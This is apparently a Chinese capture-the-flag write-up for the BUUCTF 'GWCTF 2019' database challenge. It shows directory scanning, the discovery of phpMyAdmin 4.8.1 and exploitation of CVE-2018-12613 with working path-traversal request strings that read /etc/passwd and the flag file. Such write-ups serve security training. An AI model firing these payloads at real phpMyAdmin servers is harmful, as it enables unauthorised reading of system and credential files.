BUUCTF [GWCTF 2019] 我有一个数据库
考点:
启动环境:
应该是为乱码,结合题目名,应该与数据库有关,寻找提示无果,使用dirsearch
扫描后台:
扫描到如上页面,查看robots.txt
:
查看phpinfo页面:
dirsearch还扫描到存在phpmyadmin
数据库管理页面,尝试访问:
http://xxx/phpmyadmin/index.php
成功访问到:
查看到其phpMyAdmin
信息:
查询到4.8.1
版本存在任意文件读取漏洞:phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613)
漏洞复现:phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613
使用Payload尝试:
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
可以成功执行,获取到了passwd
文件的内容,尝试查找flag
,最终Payload
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag
得到flag: